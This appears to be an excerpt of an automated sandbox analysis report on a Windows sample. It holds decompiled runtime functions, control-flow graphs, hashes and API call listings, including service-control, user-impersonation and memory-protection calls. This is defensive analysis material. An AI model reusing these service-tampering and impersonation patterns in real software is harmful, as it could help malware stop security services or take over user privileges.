                              • API ID: AllocVirtual
                              • String ID: cess$kernel32.dll
                              • API String ID: 4275171209-1230238691
                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                              • Instruction ID: 2a9954c425b5c615df3655688d6329589181e04494bf30fe7994701720054a9d
                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                              • Instruction Fuzzy Hash: 2E526974A01229DFDB64CF58C985BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 237 40af66-40af6e 238 40af7d-40af88 call 40b84d 237->238 241 40af70-40af7b call 40d2e3 238->241 242 40af8a-40af8b 238->242 241->238 245 40af8c-40af98 241->245 246 40afb3-40afca call 40af49 call 40cd39 245->246 247 40af9a-40afb2 call 40aefc call 40d2bd 245->247 247->246
                              C-Code - Quality: 63%
                              			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                              				signed int _v4;
                              				signed int _v16;
                              				signed int _v40;
                              				void* _t14;
                              				signed int _t15;
                              				intOrPtr* _t21;
                              				signed int _t24;
                              				void* _t28;
                              				void* _t39;
                              				void* _t40;
                              				signed int _t42;
                              				void* _t45;
                              				void* _t47;
                              				void* _t51;
                              
                              				_t40 = __edi;
                              				_t28 = __ebx;
                              				_t45 = _t51;
                              				while(1) {
                              					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                              					if(_t14 != 0) {
                              						break;
                              					}
                              					_t15 = E0040D2E3(_a4);
                              					__eflags = _t15;
                              					if(_t15 == 0) {
                              						__eflags =  *0x423490 & 0x00000001;
                              						if(( *0x423490 & 0x00000001) == 0) {
                              							 *0x423490 =  *0x423490 | 0x00000001;
                              							__eflags =  *0x423490;
                              							E0040AEFC(0x423484);
                              							E0040D2BD( *0x423490, 0x41a704);
                              						}
                              						E0040AF49( &_v16, 0x423484);
                              						E0040CD39( &_v16, 0x420fa4);
                              						asm("int3");
                              						_t47 = _t45;
                              						_push(_t47);
                              						_push(0xc);
                              						_push(0x420ff8);
                              						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                              						_t42 = _v4;
                              						__eflags = _t42;
                              						if(_t42 != 0) {
                              							__eflags =  *0x4250b0 - 3;
                              							if( *0x4250b0 != 3) {
                              								_push(_t42);
                              								goto L16;
                              							} else {
                              								E0040D6E0(_t28, 4);
                              								_v16 = _v16 & 0x00000000;
                              								_t24 = E0040D713(_t42);
                              								_v40 = _t24;
                              								__eflags = _t24;
                              								if(_t24 != 0) {
                              									_push(_t42);
                              									_push(_t24);
                              									E0040D743();
                              								}
                              								_v16 = 0xfffffffe;
                              								_t19 = E0040B70B();
                              								__eflags = _v40;
                              								if(_v40 == 0) {
                              									_push(_v4);
                              									L16:
                              									__eflags = HeapFree( *0x4234b4, 0, ??);
                              									if(__eflags == 0) {
                              										_t21 = E0040BFC1(__eflags);
                              										 *_t21 = E0040BF7F(GetLastError());
                              									}
                              								}
                              							}
                              						}
                              						return E0040E21D(_t19);
                              					} else {
                              						continue;
                              					}
                              					L19:
                              				}
                              				return _t14;
                              				goto L19;
                              			}

















                              0x0040af66
                              0x0040af66
                              0x0040af69
                              0x0040af7d
                              0x0040af80
                              0x0040af88
                              0x00000000
                              0x00000000
                              0x0040af73
                              0x0040af79
                              0x0040af7b
                              0x0040af8c
                              0x0040af98
                              0x0040af9a
                              0x0040af9a
                              0x0040afa3
                              0x0040afad
                              0x0040afb2
                              0x0040afb7
                              0x0040afc5
                              0x0040afca
                              0x0040afd0
                              0x0040aec2
                              0x0040b6b5
                              0x0040b6b7
                              0x0040b6bc
                              0x0040b6c1
                              0x0040b6c4
                              0x0040b6c6
                              0x0040b6c8
                              0x0040b6cf
                              0x0040b714
                              0x00000000
                              0x0040b6d1
                              0x0040b6d3
                              0x0040b6d9
                              0x0040b6de
                              0x0040b6e4
                              0x0040b6e7
                              0x0040b6e9
                              0x0040b6eb
                              0x0040b6ec
                              0x0040b6ed
                              0x0040b6f3
                              0x0040b6f4
                              0x0040b6fb
                              0x0040b700
                              0x0040b704
                              0x0040b706
                              0x0040b715
                              0x0040b723
                              0x0040b725
                              0x0040b727
                              0x0040b73a
                              0x0040b73c
                              0x0040b725
                              0x0040b704
                              0x0040b6cf
                              0x0040b742
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040af7b
                              0x0040af8b
                              0x00000000

                              APIs
                              • _malloc.LIBCMT ref: 0040AF80
                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                              • String ID:
                              • API String ID: 1411284514-0
                              • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                              • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 273 500e0f-500e24 SetErrorMode * 2 274 500e26 273->274 275 500e2b-500e2c 273->275 274->275
                              APIs
                              • SetErrorMode.KERNELBASE(00000400,?,?,00500223,?,?), ref: 00500E19
                              • SetErrorMode.KERNELBASE(00000000,?,?,00500223,?,?), ref: 00500E1E
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorMode
                              • String ID:
                              • API String ID: 2340568224-0
                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                              • Instruction ID: 0d446c16eae7c208faf0d57bd6344f7191849366e1e2b515b91accd1c8e4ec86
                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                              • Instruction Fuzzy Hash: C6D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DE90C0C770994046E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 276 40e7ee-40e7f6 call 40e7c3 278 40e7fb-40e7ff ExitProcess 276->278
                              C-Code - Quality: 100%
                              			E0040E7EE(int _a4) {
                              
                              				E0040E7C3(_a4); // executed
                              				ExitProcess(_a4);
                              			}



                              0x0040e7f6
                              0x0040e7ff

                              APIs
                              • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                              • ExitProcess.KERNEL32 ref: 0040E7FF
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                              • String ID:
                              • API String ID: 2427264223-0
                              • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                              • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                              • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                              • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 387 22f99e8-22f9a49 389 22f9a4b-22f9a55 387->389 390 22f9a82-22f9ad2 OpenServiceA 387->390 389->390 391 22f9a57-22f9a59 389->391 397 22f9adb-22f9b0c 390->397 398 22f9ad4-22f9ada 390->398 393 22f9a7c-22f9a7f 391->393 394 22f9a5b-22f9a65 391->394 393->390 395 22f9a69-22f9a78 394->395 396 22f9a67 394->396 395->395 399 22f9a7a 395->399 396->395 402 22f9b0e-22f9b12 397->402 403 22f9b1c 397->403 398->397 399->393 402->403 404 22f9b14 402->404 404->403
                              APIs
                              • OpenServiceA.ADVAPI32(?,?,?), ref: 022F9AC2
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: OpenService
                              • String ID:
                              • API String ID: 3098006287-0
                              • Opcode ID: 95cdbf281f1a643bbea0c1ff3e0810226eced42d0f9ca628c61b2f4293878a18
                              • Instruction ID: bb2dd55246d2f8b476ca66f4c4dbc0f175ff4488b9934b0ea1ca1c8d95e223cd
                              • Opcode Fuzzy Hash: 95cdbf281f1a643bbea0c1ff3e0810226eced42d0f9ca628c61b2f4293878a18
                              • Instruction Fuzzy Hash: 283132B0D102199FDB10CFE9C884B9EFBF5BB48314F14812AE815A7248D7789885CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 405 22f9920-22f996f 407 22f9977-22f997b 405->407 408 22f9971-22f9974 405->408 409 22f997d-22f9980 407->409 410 22f9983-22f99b2 OpenSCManagerW 407->410 408->407 409->410 411 22f99bb-22f99cf 410->411 412 22f99b4-22f99ba 410->412 412->411
                              APIs
                              • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 022F99A5
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: cdaf4637bface5b7436daa9873eacd637221d33d6b779e8cba42038f9dac4fa5
                              • Instruction ID: 9cdff2e3e42cc895c7be68538378d3da14931770867b585d0f0699f7abe6a901
                              • Opcode Fuzzy Hash: cdaf4637bface5b7436daa9873eacd637221d33d6b779e8cba42038f9dac4fa5
                              • Instruction Fuzzy Hash: B42115B5C002199FCB50CF9AD984BDEFBF4FB88314F15816AE908BB244D775A540CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 414 22f9180-22f9201 VirtualProtect 417 22f920a-22f922f 414->417 418 22f9203-22f9209 414->418 418->417
                              APIs
                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022F91F4
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 799dba91e6ca2a22f2532690aca021bd556d31e729e51bb57e4768510e4cdfbe
                              • Instruction ID: 4b9939355373e5205ac058f041731b36d06cb7c7fa2f67ae139b1ffe3b6b810f
                              • Opcode Fuzzy Hash: 799dba91e6ca2a22f2532690aca021bd556d31e729e51bb57e4768510e4cdfbe
                              • Instruction Fuzzy Hash: 9511F7B1D002099BCB10DFAAC984BEFFBF9EF58314F50842AD419A7250C778A945CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 422 22fa0e8-22fa165 ControlService 424 22fa16e-22fa18f 422->424 425 22fa167-22fa16d 422->425 425->424
                              APIs
                              • ControlService.ADVAPI32(?,?,?), ref: 022FA158
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ControlService
                              • String ID:
                              • API String ID: 253159669-0
                              • Opcode ID: 20e7b676af57ffd6670d1a24cc60241aa931d4066c54d213e8e1417adf0a0698
                              • Instruction ID: cc33c7162db6ddd7bfb2199bdc2b350db380af0dbf63716dbc88c086208421b0
                              • Opcode Fuzzy Hash: 20e7b676af57ffd6670d1a24cc60241aa931d4066c54d213e8e1417adf0a0698
                              • Instruction Fuzzy Hash: 6011E4B19006099FDB10CF9AC584BDFFBF8EB48324F50816AE558A3750D378A945CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 427 22f9ed8-22f9f44 ImpersonateLoggedOnUser 429 22f9f4d-22f9f6e 427->429 430 22f9f46-22f9f4c 427->430 430->429
                              APIs
                              • ImpersonateLoggedOnUser.KERNELBASE ref: 022F9F37
                              Memory Dump Source
                              • Source File: 00000002.00000002.415466085.00000000022F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_22f0000_aTaf.jbxd
                              Similarity
                              • API ID: ImpersonateLoggedUser
                              • String ID:
                              • API String ID: 2216092060-0
                              • Opcode ID: 543a55c3990f7f53da39911fd6fd81f162f6cb0ff982c96f881036981d7c7038
                              • Instruction ID: 1d87705fe10f25e2b9e48beb3a9193cd581d7e85b3837cdbebbc3a7755be38c6
                              • Opcode Fuzzy Hash: 543a55c3990f7f53da39911fd6fd81f162f6cb0ff982c96f881036981d7c7038
                              • Instruction Fuzzy Hash: FC1106B1900659CFDB10CF9AC584BDEFBF8EB48324F10846AD558A3640D778A985CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 432 40d534-40d556 HeapCreate 433 40d558-40d559 432->433 434 40d55a-40d563 432->434
                              C-Code - Quality: 100%
                              			E0040D534(intOrPtr _a4) {
                              				void* _t6;
                              
                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                              				 *0x4234b4 = _t6;
                              				if(_t6 != 0) {
                              					 *0x4250b0 = 1;
                              					return 1;
                              				} else {
                              					return _t6;
                              				}
                              			}




                              0x0040d549
                              0x0040d54f
                              0x0040d556
                              0x0040d55d
                              0x0040d563
                              0x0040d559
                              0x0040d559
                              0x0040d559

                              APIs
                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 435 40ea0a-40ea16 call 40e8de 437 40ea1b-40ea1f 435->437
                              C-Code - Quality: 25%
                              			E0040EA0A(intOrPtr _a4) {
                              				void* __ebp;
                              				void* _t2;
                              				void* _t3;
                              				void* _t4;
                              				void* _t5;
                              				void* _t8;
                              
                              				_push(0);
                              				_push(0);
                              				_push(_a4);
                              				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                              				return _t2;
                              			}









                              0x0040ea0f
                              0x0040ea11
                              0x0040ea13
                              0x0040ea16
                              0x0040ea1f

                              APIs
                              • _doexit.LIBCMT ref: 0040EA16
                                • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: __decode_pointer$__initterm$__lock_doexit
                              • String ID:
                              • API String ID: 1597249276-0
                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                              • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00500929
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 8d14ae05a9dad9c05cb957789c0d7b66081069df36a9c1cd08e0a696cbd40e96
                              • Instruction ID: 30d7a66bfda154b9128336625e3198fa971fb7c00ac6e6305f959e87c74458a5
                              • Opcode Fuzzy Hash: 8d14ae05a9dad9c05cb957789c0d7b66081069df36a9c1cd08e0a696cbd40e96
                              • Instruction Fuzzy Hash: 919002A034415112D920259C0C01B0500011791634F304710B131BA2D4D84096004115
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                              				intOrPtr _v0;
                              				void* _v804;
                              				intOrPtr _v808;
                              				intOrPtr _v812;
                              				intOrPtr _t6;
                              				intOrPtr _t11;
                              				intOrPtr _t12;
                              				intOrPtr _t13;
                              				long _t17;
                              				intOrPtr _t21;
                              				intOrPtr _t22;
                              				intOrPtr _t25;
                              				intOrPtr _t26;
                              				intOrPtr _t27;
                              				intOrPtr* _t31;
                              				void* _t34;
                              
                              				_t27 = __esi;
                              				_t26 = __edi;
                              				_t25 = __edx;
                              				_t22 = __ecx;
                              				_t21 = __ebx;
                              				_t6 = __eax;
                              				_t34 = _t22 -  *0x422234; // 0x98705858
                              				if(_t34 == 0) {
                              					asm("repe ret");
                              				}
                              				 *0x423b98 = _t6;
                              				 *0x423b94 = _t22;
                              				 *0x423b90 = _t25;
                              				 *0x423b8c = _t21;
                              				 *0x423b88 = _t27;
                              				 *0x423b84 = _t26;
                              				 *0x423bb0 = ss;
                              				 *0x423ba4 = cs;
                              				 *0x423b80 = ds;
                              				 *0x423b7c = es;
                              				 *0x423b78 = fs;
                              				 *0x423b74 = gs;
                              				asm("pushfd");
                              				_pop( *0x423ba8);
                              				 *0x423b9c =  *_t31;
                              				 *0x423ba0 = _v0;
                              				 *0x423bac =  &_a4;
                              				 *0x423ae8 = 0x10001;
                              				_t11 =  *0x423ba0; // 0x0
                              				 *0x423a9c = _t11;
                              				 *0x423a90 = 0xc0000409;
                              				 *0x423a94 = 1;
                              				_t12 =  *0x422234; // 0x98705858
                              				_v812 = _t12;
                              				_t13 =  *0x422238; // 0x678fa7a7
                              				_v808 = _t13;
                              				 *0x423ae0 = IsDebuggerPresent();
                              				_push(1);
                              				E004138FC(_t14);
                              				SetUnhandledExceptionFilter(0);
                              				_t17 = UnhandledExceptionFilter(0x41fb80);
                              				if( *0x423ae0 == 0) {
                              					_push(1);
                              					E004138FC(_t17);
                              				}
                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                              			}



















                              0x0040ce09
                              0x0040ce09
                              0x0040ce09
                              0x0040ce09
                              0x0040ce09
                              0x0040ce09
                              0x0040ce09
                              0x0040ce0f
                              0x0040ce11
                              0x0040ce11
                              0x00413644
                              0x00413649
                              0x0041364f
                              0x00413655
                              0x0041365b
                              0x00413661
                              0x00413667
                              0x0041366e
                              0x00413675
                              0x0041367c
                              0x00413683
                              0x0041368a
                              0x00413691
                              0x00413692
                              0x0041369b
                              0x004136a3
                              0x004136ab
                              0x004136b6
                              0x004136c0
                              0x004136c5
                              0x004136ca
                              0x004136d4
                              0x004136de
                              0x004136e3
                              0x004136e9
                              0x004136ee
                              0x004136fa
                              0x004136ff
                              0x00413701
                              0x00413709
                              0x00413714
                              0x00413721
                              0x00413723
                              0x00413725
                              0x0041372a
                              0x0041373e

                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 0051395B
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00513970
                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 0051397B
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00513997
                              • TerminateProcess.KERNEL32(00000000), ref: 0051399E
                              Memory Dump Source
                              • Source File: 00000002.00000002.414927111.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_500000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction ID: 8bb64b6ef3fe0333a43da50481b806d2affb3b2ae0a9368f720a95498eb29b51
                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                              • Instruction Fuzzy Hash: 9421D2B9A01204EFD720DF64E95A6857FB0FB08356F804079E50D87662E7B86A82CF5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040ADB0(intOrPtr* __ecx) {
                              				void* _t5;
                              				intOrPtr* _t11;
                              
                              				_t11 = __ecx;
                              				_t5 =  *(__ecx + 8);
                              				 *__ecx = 0x41eff0;
                              				if(_t5 != 0) {
                              					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                              				}
                              				if( *(_t11 + 0xc) != 0) {
                              					_t5 = GetProcessHeap();
                              					if(_t5 != 0) {
                              						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                              					}
                              				}
                              				return _t5;
                              			}





                              0x0040adb3
                              0x0040adb5
                              0x0040adb8
                              0x0040adc0
                              0x0040adc8
                              0x0040adc8
                              0x0040adce
                              0x0040add0
                              0x0040add8
                              0x00000000
                              0x0040ade1
                              0x0040add8
                              0x0040ade8

                              APIs
                              • GetProcessHeap.KERNEL32 ref: 0040ADD0
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              • API String ID: 3859560861-0
                              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.414829650.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000002.00000002.414829650.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000002.00000002.414829650.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_400000_aTaf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae75fc8c093f7e9f6b878a788f5ef27d36d5e75305522888a43586f13dd1e25d
